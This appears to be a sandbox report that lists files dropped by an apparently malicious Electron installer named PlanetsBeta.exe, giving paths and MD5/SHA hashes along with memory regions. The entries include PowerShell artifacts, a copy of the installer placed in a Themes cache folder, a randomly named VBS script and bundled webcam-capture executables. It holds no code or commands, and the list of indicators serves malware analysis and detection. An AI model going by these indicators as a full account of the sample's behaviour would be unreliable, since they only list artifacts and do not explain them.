SHA1 d5efdcbc7ca17de29f3075f6434f31ab2e895826
SHA256 f47bc1f7f5ab64681d0b152e1a019da60f0ef057ee8bf2ccede019dc4030c177
SHA512 48abb6ca2290820db2898b05820bb25e70fb1292c816eb0c8f17b3c5452de9fff7027d216d2bf413900f408f44ed4ac99151b28142a212c5cff8dfe229e87b9b

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\ru.pak

MD5 75457b95d2bb03891232dae7db886387
SHA1 e5a7569df7f91533703626d167ecc8cddbd27205
SHA256 e0894d3aa3f8e0f8ac457a3300001d4e1dcf95980712f8c8e9c845eb4c2bbfa6
SHA512 9813239cb162cec24cb81cffdae2df06889782813d917da186ae40df6dae64477467e4b32ead2d714bc1de671538d4c1fde990d83d3ee69e0932f17226687a78

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\ro.pak

MD5 24b01a438a3ab9699d4ca97c081b5e82
SHA1 0d0b082544d23425a74199fb0a6c11192f0bdf7d
SHA256 38290b1c9712296d82ea1681ef95544a1eef4872289134b11e50af735e6deaca
SHA512 43199772312156f4633c4202499cde8f808e5e632c2013ec1129acee01a3f184e86df2616626173178efe04b6f0773ad9a0e8b8cc6a735d23d68dcfe9dfd945b

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\pt-PT.pak

MD5 ecd84b296d3bb312ee18e21017311986
SHA1 f5625523f85c10723750834a54ff59a2dd886fb3
SHA256 fcfaa9c44c445876c286388b6a1abc1df949f3dda3d64fb57d6e0d54a05cdb94
SHA512 e95b74238220024cdd0bd1c0f18beadbbe427d76cd8d6b32d5700adcd34ffb068ad0bf75404921485c8077f395f5111cd40d5dfe2b5b8f34c62e6fc80b507456

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\pt-BR.pak

MD5 88ad860c73676ffb4025b5c691f29942
SHA1 3c5e5b999ea7153ccdd1b4cc7b6162de3456b558
SHA256 25f0bb0b0230d99a9064d52668636f3be85903bf27a68124d79a2fe93c30fe0e
SHA512 41589bb9ab1b8307f62ceb4e6493d7903731a3e63807e0044379c4acdda881c21839234f5f1b8ad1af732bfee6231c0556ce92e582505379ed949980185bb750

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\pl.pak

MD5 644c0ace25d6e532b56510a736c6bc2c
SHA1 1bd0fec952107b493da04c46423da634ff3e1504
SHA256 2ff9e382a31783285b7d85676e629e2f6db26bb9536ed17b7fbe5ac61a895ec7
SHA512 9a1f1e884c2f214b8b0c63543809ddd4ba0fd533f1d8434e926051f3db434f60cc4df2462c2a43254b2a9685b3869eef49463c212892e417c82c3a7b497e3559

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\sl.pak

MD5 e015b6f5042be2dc96a4e23dcf035502
SHA1 7946509eed8db1e4c1f3da99ffe7155c86fdb4d6
SHA256 99536d1bc73eec81d5bebbff641ea195544ee5e3a41bb17ddcedf9cde9b141d4
SHA512 b2a2eaae93c506a053862bf1cde02eee53b3ea2e2fe4c964c51dbacb8b44de820a779311cfe01458e2f08f88bce1172e8c5e1e6d28cd3a355ff84baa00023b8f

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\nl.pak

MD5 cf6b1cbfd669e9461553974ba37a475e
SHA1 b33867e9bc7fd88ca98a76dc4bd756bcf18887aa
SHA256 9a83ad866ad7fd9d65ecbc1e95c276cfce27e8257c76a16950fd14971e66b864
SHA512 e463029bb37f6bb3ff5cb6281f64291ada1b785fa33137e7aedfc7b5e409e99c75a91e7cf9b6c0933e970f70c14861190de66fc5d68925b687a6f5da02e21077

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\ms.pak

MD5 6cfadaa784e687e6dadbcd80e631bc9b
SHA1 481acb75f525055bf4e45ecabe0eadcb9c492106
SHA256 fb5e125dd5e1f21e8df229d22cb3d1f9078bd79bbddca352899248f2a8b21b71
SHA512 0d7da5a90fe9372bc704ab8cdc8cbfb14d323cafdef856987e2d9e34d980196c03985e25099f5d1bcb10c97f040f4766e2c3713718649bb3f43914a77f0dbb39

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\ml.pak

MD5 04b2540c25990a5e0a9b227dcce6ae0d
SHA1 4f8ccd154f54dfb083d4d1a3ed0994842c8ab13e
SHA256 556165b8b54c6e21bc66d12b3f5be393136714467c427f7114f314d18ad3c661
SHA512 4cab47e42e8f5d4a83851871f97f3e1360c993ba530dbb4b4b736350779784bd83189e1195d3480ce87298bb8f9b7f249fefa7764d850e5b0002895609626785

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\lv.pak

MD5 264c6e20b3088ceb4dae5773cef0cb55
SHA1 fb6ff83ff14df008092bc3ee73bda7491e8e090e
SHA256 a676a781c1a587eadf23e5c69bc52f2d352346a70bc53ca908450362535eefda
SHA512 01e949f92e1e8599c581929a601d39640abaf1d907ce10102e591c3d490dd3874c679c75bb51308ead55a3bd0c6dcd1b8d4b2daf98ce1cf1c6bab42946e8b1e8

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\lt.pak

MD5 2d4fca437a7548893dc4b51fa5b33c33
SHA1 c1493013d7d981ea9223716e415380992de65c2f
SHA256 776dba792df7b444e1b720326312d8b8312cade74a1372c49456d932b7c65769
SHA512 b6a55ee1deff48d717a3e9399aef3c45eeec810cc5b5709fa3e9f56850115a5b02e02b7959ec77a6797e68516ee9372bacd260e62ac0d55a8e4c1c27af782b42

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\ko.pak

MD5 d6e2c18c9eabba59b50d147d942125ea
SHA1 0918879203c2050b4f9f449f5616e430897ba0b9
SHA256 f3581cea2e5b022b121010ffc5d67f86f717e3a0c0402abd81e24c87fd135b76
SHA512 f605f7b9893166778af156f9eb76eaa1209e7432450899540cd462ce0ffa69caf6f570b910cdd6d7bef54354379e9892a658e711baa93241da33755c107da859

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\kn.pak

MD5 5115cde84b4c674db412619b65433004
SHA1 164f33e7e2e9f685a579da492a6fc8806beb6cbf
SHA256 891e092c6895e23be986c3e6d39dcea9b6b75f1448239c13fd406680e50407a7
SHA512 090a247898cb533325d2b289a6cbd8db2a755ef0abab49d82f333e57b290c50b5996b81f15d8adc30160b216eebed3a1476aec1627195e52189557c1d48b0216

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\ta.pak

MD5 31dada843d0b4f9a66b184cb6d7b8b92
SHA1 0320b31981043c6e4c17470bf2ff4c7488553511
SHA256 457070b35c813175f5a7b630478073e478ff2bf23915dd3dc7a5b3b339cc2b0b
SHA512 c5b6ea595d3154fd9fe03f49a19f78eb4068718ce005b18a165d491459a290c29956b02a109ce2c314746773760c8e5c0d7064f384c65a572c78109f03538860

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\sw.pak

MD5 99e385ebc1ef8d3daddb3a171fa79edf
SHA1 3164804dfe9d9b5e891abafe92e5ba67d2b5d4d1
SHA256 8ec45ac391a085d531fb21815086c2da4841aa016653cb4f8484cfc2615d6c01
SHA512 797c105fecef1e15870aa101e3fa1835d5a467a9059c03b3636c54934d1de263ab7f23599e21d9787cb3849c7cb7d29f5bdd8ae9ad10fda8015c1392462e94c0

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\sv.pak

MD5 41e76f7775fc9a2d6e3c02c46e9b32f6
SHA1 088c15c74a68bee69682bf89c31055332b68c84a
SHA256 2533676479e9469ffcdaabcb47d3e39bebfe7ae2b80f70784e918a8827439e13
SHA512 6cde752d748c4772b533c8894f18134e5842113f8c7590b44a7dfa088aed65b232361fd16170df3b0d738066dbc3a769847adf4dd8ba42de63c9c2b33f9beb6b

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\sr.pak

MD5 af7083f2a4bd95dcbe792efade352662
SHA1 dc69aa831836016f6e66c6079931503d534a7862
SHA256 e3b80d9fdd420a05d66cc12e685ac94500106dd51a555bbfa2d085094f81e8dd
SHA512 342400ba94f6cd08152f96aa2b905184fab429c38cedb4bcb4ac0c503169a9ecd47aef208b4d7ffae08b0c0afa7aa089347a20739379d05f3e4e111be842b8c4

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\te.pak

MD5 793a87d41cde6e6d1bb086284f69733b
SHA1 d887e3842b664f55b7308427aa6f5bf0b352d879
SHA256 5cdabd1ad41e8048f2cc6b1615e68b99159daa1aa6706b939447c1811bf0e255
SHA512 7c2e53baa387480eed45315bd9d53856ca46e5777ecdc9c29a0de7b0ad04beb6cbb8b5df0aa7c306395fda563037e06bea1ca70e433ce5a3ccc2ec184dfda972

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\uk.pak

MD5 d791b1ecf2931b2fb0c31aac170c7cdc
SHA1 02be115a9ff94fe5250651b6de4323eafc44fce1
SHA256 ffae6286d44c8e219ef90d411ad8746159a6ff8ea610e2a651147a3956696a22
SHA512 3a2edb8069e4a9734ce5e02b7c3de3c968c5bbc116f17f52f97e2bb2c78485c456c4f0cc952686c1aa17b7ee4d326a1dda698afafc63c79d842ca3905181a8da

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\zh-TW.pak

MD5 c2c35fcedc3708b5bcadf36587393002
SHA1 31d72402cbd44ceb921cedd806259c2cd14e411f
SHA256 cfe4c2c5eb131fd92e0d11f912714c5a9a048833ef3ffbe32679b3d58da8f8ac
SHA512 9ba3ea2d569d1d3ef09e94d7e66f843c8804368c4d016b6289e7dba002f7d2d50884a76c93eef879d87abcf8b36dd3e682b7bd3a18b2b5a969256cef672abf01

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\zh-CN.pak

MD5 098d656a4f4bd8240bed10e7678186c7
SHA1 0c19ab62b4262f1b51558e8aaa79e7741f73393a
SHA256 a55f568ad3a8854cec25699484f55024501c8a0967738ba694e073151e5981c7
SHA512 084538ce774233ca6d4393bb42239b0b85e11bd73dd19ba47e55796ca19848941b037510c0fca4ac08b4b2e0ccbc9b4ae72ef88a3e841738dd211961dc53c1e2

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\vi.pak

MD5 69c8796439192577f48bd249175aaf37
SHA1 97c52088ca69dada593db0e42b2135d264646454
SHA256 d7fdb53592de803a5fbcd8561c4918f1562f92fc8a3fd0039a2a1a7b76a8ecc2
SHA512 65eb7cb15291474ec7f9354775e59bcf334c90ddf3498ebd184e4c47118308421b2405bfa679e4b3a70ed1790e167c109fc2c72e89c3e31b5378cae975424144

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\tr.pak

MD5 40491896ad21543f339467186c5efb40
SHA1 695dde7cc35056dcbf0a533aff8299d4c6b61bd8
SHA256 43e99e132acaba88971b81a43531845dc7fc3a1e0794c3373de7d9a50a5655aa
SHA512 18d5ee9914849462e0b1bafd1ca216b29d0795e282ae0bdb354b15caf5c18f37f44fbd6f626b2cbb095e3398a6496de72e5b0d15621433979b5a589e34fac818

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\locales\th.pak

MD5 43edd25f67ce6e6cea5373009ff0a1f8
SHA1 ed72ca6620cf23837e1334be50ccf616806bc5a2
SHA256 287897cf3df2db1cf59b872e6575ba8dfcaa0c1f68c17a9c91da6c4490adb8b0
SHA512 7160a72bd2e6b0ffa71e5d279995cc8be24a87cd9386eb29ab0eee79b8e607f5d824a11b6b4e3ef4c0f851a9d485a9642cb6adaa65c07933dca6e6f2c0052fc7

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\resources\app.asar

MD5 e0731a222e85f07f5a12d1c0ccf20834
SHA1 604413c865c4ca5e83d7c00ac6dc197ebddbc28d
SHA256 adaf5b5dc443e0dd38b2c04fff999f1cc4bfb4628d9dc9c00d57e97328f148d3
SHA512 7af5e837dad1e13edef10dc870f66ac0a4192ec1d30b3666c6c36a1e5ca8fd106d838c718ca575344c7c48b69e97210b45c4f35e056544c0d376d85b96ee8271

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\resources\elevate.exe

MD5 792b92c8ad13c46f27c7ced0810694df
SHA1 d8d449b92de20a57df722df46435ba4553ecc802
SHA256 9b1fbf0c11c520ae714af8aa9af12cfd48503eedecd7398d8992ee94d1b4dc37
SHA512 6c247254dc18ed81213a978cce2e321d6692848c64307097d2c43432a42f4f4f6d3cf22fb92610dfa8b7b16a5f1d94e9017cf64f88f2d08e79c0fe71a9121e40

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

MD5 471b15abc9f2e98fb7ed7361d3f045eb
SHA1 95b5798d80a9410872f6ed485ae2b43ca3745540
SHA256 7c262639cb22348dfd627dc07c76e8748e5bcacde2dcf1614773ab174c831004
SHA512 5b3b59aa1dbaef31b0ff6ccde082d7c312e39e311a46fe20d590d5d7765f934d3b663da9609ff4fb7beba2e8fa85376cf74f14ae077f3c0b49189cc28c30163a

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

MD5 067e233b0609d56ff4756bedd8c0efe0
SHA1 96419d05adc4b6674948b4ac14f8ab5bb3ce4380
SHA256 6bee642c1b5de99e4edba87ec3221c2ecd10b65e666b6f2bef64a745538ecf74
SHA512 94900f5ff762930b1b060ba4dd44d629d6c3e2dfc0dacb1a543f1ea5a3cd40e793acaff4abefbff588ceb422d65f8041ec190a2b56f7c303c3314eb16eca4159

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

MD5 c20c205c6f8d70a5e1351a4041a3ec9f
SHA1 e1b2a763dd6c42439656e4e55aba0f3610ff3784
SHA256 bbcbb170242d9ff1b56680a80b1f8755df1135f9c714535ff3b3f575442f38dc
SHA512 dffd59d775dbb89cd886a2212fb9fe4cf0b2bdd7f2c00f8dc7c6b2287053b4971c8c6c033109ff1f90cdacea082e44d3c19fa76325d24976420c418218e701f1

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

MD5 16a12bdc986207390dd79d658a6b2263
SHA1 b4b41f62cbc1e1ede786c6e30e11df8e61750bad
SHA256 50a8dd2f292bea9190204a42de067a34d5cbbec53746d40fe5b067fc85190bac
SHA512 d20394028c5d3ca46bb4879cac40da07b7d857f9a4a834bb4db4bd047f1a3265a80e1f7528244da6ee97c2f3e0cb5b2e51bc88eeb382a027939c2188e66dcdd9

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\swiftshader\libGLESv2.dll

MD5 c0b36d56d83e601bf246f7709a8c5f9d
SHA1 b025a6070f7d61c7d1827856d2d4043834fd23f2
SHA256 45bb5e1f8dd87129ac0a75c78f8f29d06e3ac182a00fc5199b692068f1e05a53
SHA512 e429ae63bd8a7d5a936a638783511693e8fbbc91d97779b3d4dd3f0880f1c8a820106bfb57cf7ee6b3639f19165de87bbe127aadd81218689fc6c8fada2106d1

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\StdUtils.dll

MD5 c6a6e03f77c313b267498515488c5740
SHA1 3d49fc2784b9450962ed6b82b46e9c3c957d7c15
SHA256 b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e
SHA512 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803

C:\Users\Admin\AppData\Local\Temp\nsk120D.tmp\7z-out\swiftshader\libEGL.dll

MD5 19dc9ee70e7765bb63a66b6826e8ecb7
SHA1 1a12f983f8b35cc2955d30657971f113c47dc164
SHA256 83d5719abee35e051d984510e1d5d9317a109031698814742b59bdbbe7d4e30f
SHA512 1fda2bcc4b2e70987ca6011ab2534007ae4f752016d29a588aaae839bb25c35e03773f220b6a8e926cf2643997e7d4c0f28743304269b2c55642ce12934def68

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

MD5 b53ff6a943b0c5ebea65987708390dfc
SHA1 8236396f16a7ffe9d61585d47fc4afdb6391d3d7
SHA256 f4a3b293aedeee7659a48d79f3aafa328db6c3e0890eadeef0b827b4589a13da
SHA512 ddeb364fc76f78d35645e8f7ac3bae97768043cacf244b42d3416fa7eb3eea26fd5b4f21ad9cb76f1da71189d64155b38eea07040624527270af560762a5bae1

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\ffmpeg.dll

MD5 c3842fb3087cdcdb04020ac38683c289
SHA1 329dbcd4a1c79b891b200f11eb50194b85c493bc
SHA256 e79792af338d61424bac87a19c6f34f3b4bc1382345633b8d509253a0a6c2133
SHA512 069196b8006e908954e7ab16131a0d10889a0f7517eaab2423a82fe49fb9b045c0d95dbf7c08c10ddf1a21983aea4a0d207decf91baacff0884511589a57dec5

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\icudtl.dat

MD5 3dca5e7c9841ef91996e28bd77fb8b13
SHA1 082ec8c736363b0add1cd65aa0a1239de1a03e76
SHA256 882a37e79e6b2881a05acde9fbaa535620539ace3949ad0c695fa4ddb2ade77c
SHA512 3d7d551221c5402c2a2be5f9304caff262c39b6cf0f3e1f5ed51d3718b3e2178a7250f1c47657a72eb40e6f2309fe1b57b91554440d6b3be9ab1a3ec3b039496

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\resources\app.asar

MD5 17b8f295c26c2962d5ce0ecea5e47819
SHA1 6d7542782376647ca96be32f2b1f8f6cc3d4886b
SHA256 15b0ca8565ad833db835d8a73abe893f059460ff859474ab30f900d1a7ab4bba
SHA512 afe8bb501ad586243ccb81a2bf3f4d1e24b5479eb94ef22fc630939880e7ac3ecc492fb9cc5a86c2f63f25a2874b3eb66e8b4195cebaf04a9b76b83074f64e37

C:\Users\Admin\AppData\Local\Temp\4df87de3-37c1-4d64-9c53-b17661733ac7.tmp.node

MD5 3072b68e3c226aff39e6782d025f25a8
SHA1 cf559196d74fa490ac8ce192db222c9f5c5a006a
SHA256 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
SHA512 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61

C:\Users\Admin\AppData\Local\Temp\1ac57fb3-fd14-4e82-af3b-c9c2bab19325.tmp.node

MD5 dd007baf84ae5fbdf1ffd044503c4be2
SHA1 d9a58e1b7becd64e487e8d1c0097957b14544f7e
SHA256 e609cc9754b1098c708b6508f1731b6d0782d781c8e2339aa1e298b8ee4123b3
SHA512 a4a3f937ce54a1ba73a00a6084ae3b45976ed4a85e49dc59a5e3053f6397fad11c371509ffe70f01cf6516d0489b3fe75fc3023bedf63e4b0c25beb03b669880

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\resources.pak

MD5 72cc2a6df13551c1383afa05bd247ef4
SHA1 4dc4b85775fac88f4ae95d6f3cdf549fed0e1b11
SHA256 cfef50645522db5dffa667be287fc2a9aa1543e979d75bd7084e1b632903e50e
SHA512 46112fa39b44e310be9fb50c1c76b77613ab040a6d98f0af1d97d6ead27d0c195b37596cb2f83e265efe92bc6150e3dd2098ed29cd781bb4f67f92aaa623ad36

memory/540-578-0x00007FF9B4F90000-0x00007FF9B4F91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\ffmpeg.dll

MD5 bf80c4238b86c6d2957674bc6e032b94
SHA1 b0f1c92e15861d1c47769d0721fb960364232a75
SHA256 7fad43e1992f42ce3a8e6dc07ad75a287e72e2bb96333d0d43ffcca75dd2b0d7
SHA512 1ff518201d5006ac1cefe7b9dec5e9835bc44d2da4d0f000a386330eb5d258d61ba8033917e62b37ccccfcf856eaca3c38dab4b6220860454e80adee38c7b180

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

MD5 a9c6240988394c6c4ccf1904331141e9
SHA1 f0f8bcaab8da90a8ca700511eb1ebe532e1706d7
SHA256 72d77c26b7266ea4b2d262ed9401e544c3a48a6af034f8b24cb2a78940b45a51
SHA512 5e5d26d7f0c93e1ccf151ae24f56a9bf92367a67b81577a515af781643c7405a2c2403f0e175e0448d80b4eb2016e6c67ec5c71be017d6c77a5e8e6439cad98c

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\d3dcompiler_47.dll

MD5 00460c2cfd7459068ad5d1b6a5142cc7
SHA1 87b74b6b6ef9e1c1b2623a44977b6c9b7b4a17b3
SHA256 71c9ce833e589c3ec57683867387e8685a003290ef4e3898419d2a3da7dbf819
SHA512 05c4c783c72db44ff094d1e6f6fd5300f9caf9da7644bf4a38790bf94a8589eaacf53fb6007f137186c889a3b392fdecfc6a44d5b282576b2928591164993235

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\D3DCompiler_47.dll

MD5 2a0c5dcb4f78774f2ffe7051e05d1dca
SHA1 edee1782eeeb0261b0ed81241bbc524fc80c22aa
SHA256 5e2500d8546f259a2ccab45bfd5254513d7095bc3af9513207f096c912563dcd
SHA512 c6ed392c3571793180a345e7fb806fd0b3ab1b23e88a6e2fd5c4f0dae1ef9b4c946a0bb8b7fe5a1a2da53df16fdefc2184b53dab9a6417c1e7285d59d00c3e99

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

MD5 f2886753d3d9f7f8abb41094127a8cb0
SHA1 4933efc51e2081882a5aaa1679424da0a2080dea
SHA256 7206c6f1395fabef4ef3102cf2e471178a235624deb251af9e0d16c495f33065
SHA512 f43d21311b3ab805a2db29242de32e7f23423cd31ebba84658b28968223dc39677ad6c97e762745654f30921fb3785905fd834414e6b14d86af1a24fe949cf8a

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\ffmpeg.dll

MD5 3e6081cf8da20ac43514cfb44b4d6338
SHA1 47fe8cb68bc44cb38ce72ac44eb6964de61e6c49
SHA256 fdf4adaded16ca70297a30d9b44c691827bf115106a30a3127aa90a93edc9294
SHA512 182e2173a754d1683d4b8c0d2e0c625bd33a84fe1e3ea178754243f0cb17e62685f360372beb0825b2a568eb7d4913bbce57dc8453b2dadd5471ce3c7a1a94fa

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\libEGL.dll

MD5 8352fd22f09b873193cabc2932be92f0
SHA1 5bd2b58854b279f1733c5f54ea2669ee8a888d9e
SHA256 14a4aaa010be14762edfee01fd1f6b9943471eb7a2f9011a2b5c230461cd129c
SHA512 7281e980f2e82f1cc8173d9f8387a97f6e23ec5099ed8dca02222c4e17fa4cfef59d6aa300b1cf06d502bdcf77d9a6dbb08ad6658ae0a28ae6f9f995109da0d2

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\libGLESv2.dll

MD5 5e30b529172bebbe903df9414f107452
SHA1 232f5c6cf144434b45bada21f62264ea5ea6cbf1
SHA256 4b8c6bb5903ffeae964afe17a340da6a5203630ba74723c82613586144917944
SHA512 e48beb6e1066a135e9e80c5fa5b682572e37e415a51c3881eb73c6cf33d67e72755b4a3322db5e642ca6efe4d866109dcc030aebaa6ea993491cb1f0b7b0cbaf

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\libglesv2.dll

MD5 3eea84e8fadb2d8abbe826a934a7c6ec
SHA1 02a534e92cd03e9a886fca3cbc259ea9a1101074
SHA256 82b421f9c397dd8cbf994d27e5142e449dabd82fe72392721bf343cccd933b40
SHA512 1352b350738cbe7773961cbc7701b941a5bc8967d8ac0fe1b9639fa174164b2fcce8a15f84d0af748c3b08b50b33e5f94dffb920472e0dd4fa1032dba6d932e8

C:\Users\Admin\AppData\Local\Temp\2ZilskLsKlpZ86GEi9fNDMCGMfK\PlanetsBeta.exe

MD5 8dfc576c989419fcbf1b842c27a67193
SHA1 91e651da4ed512ef64f3dbf4bbe0c36d319ce3fd
SHA256 d352b3345632e178291a58d61c95d3e86d30b88de0dcf497bb057201d8ff7cc3
SHA512 08d321c4391fe0c344decca828d4b3e86552cd52c330a16558ef61bb409ef211584ebc1d647016d6db2271a6c1d4038aaf958f607a43c7264eecabacfe84eda6

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lasnvdlg.efz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4468-612-0x000001C6F2940000-0x000001C6F2962000-memory.dmp

memory/4468-613-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/4468-614-0x000001C6F2980000-0x000001C6F2990000-memory.dmp

memory/4468-615-0x000001C6F2980000-0x000001C6F2990000-memory.dmp

memory/4468-619-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/1932-622-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/1932-623-0x000002047DA00000-0x000002047DA10000-memory.dmp

memory/1932-624-0x000002047DA00000-0x000002047DA10000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

memory/1932-635-0x000002047DA00000-0x000002047DA10000-memory.dmp

memory/1932-638-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/112-644-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

memory/112-645-0x0000013564470000-0x0000013564480000-memory.dmp

memory/112-646-0x0000013564470000-0x0000013564480000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\PlanetsBeta.exe

MD5 b96b1c0743d025b60150ac40e1a1b961
SHA1 d4c8c762a7224b901a2567ff9229565c61a995f7
SHA256 d0e9466cf8cfa158fdaa1ef9fbdacb4135df2f2960ea4afee419fd6028267356
SHA512 06096cdef47c58598c1d7d631a3ddc31b28627ddf7f9a30088f724a51489369561d69115d72c59f0adeb23f504fd89152d9028339cb2db702e6557dd291a6cd2

memory/112-659-0x00007FF994B10000-0x00007FF9955D1000-memory.dmp

C:\Users\Admin\AppData\Roaming\P6LjztgNZS7e.vbs

MD5 4026805d36b03d1b13caf96237877906
SHA1 4677e317838dd4e6396e2eda0c312b43f83884e6
SHA256 1382c082069440c4555f4db936ef679eb0c8e36f5b4d87dd59fe758b49d7c615
SHA512 ba202a22d68bd508212365a882914a4aed43c09414bc75d44a318d32fc555471f9639e00e1842f08af2f2df79891e8056fd8e835364c2aeb118f7ccd5693a16d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b902a08e0d1b1a64e31f6c1781f1159e
SHA1 719d661f7d90f04f48531f926935bd1ff4f12e70
SHA256 12634b8c4e7973ce9c7e465817bae08db76ccbb2962cb92204e468ed7757c66f
SHA512 975340e8373d50490aa5c7073e36093fa498ce6dc7ad01ccae2613fabbd62a0d41e50d25ab21b8dbf62eccf2fd044278f86da581a87b297fb512ebf625eaeab2

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b6bcf03ebd2ea895f6b438ddb5e6db9d
SHA1 fa6624835b8fc2f7269211331ca7f160c39e0ecd
SHA256 14d39b771a66225430368f9173af921c3ecb838bebc8ec63042eacab737f1ba9
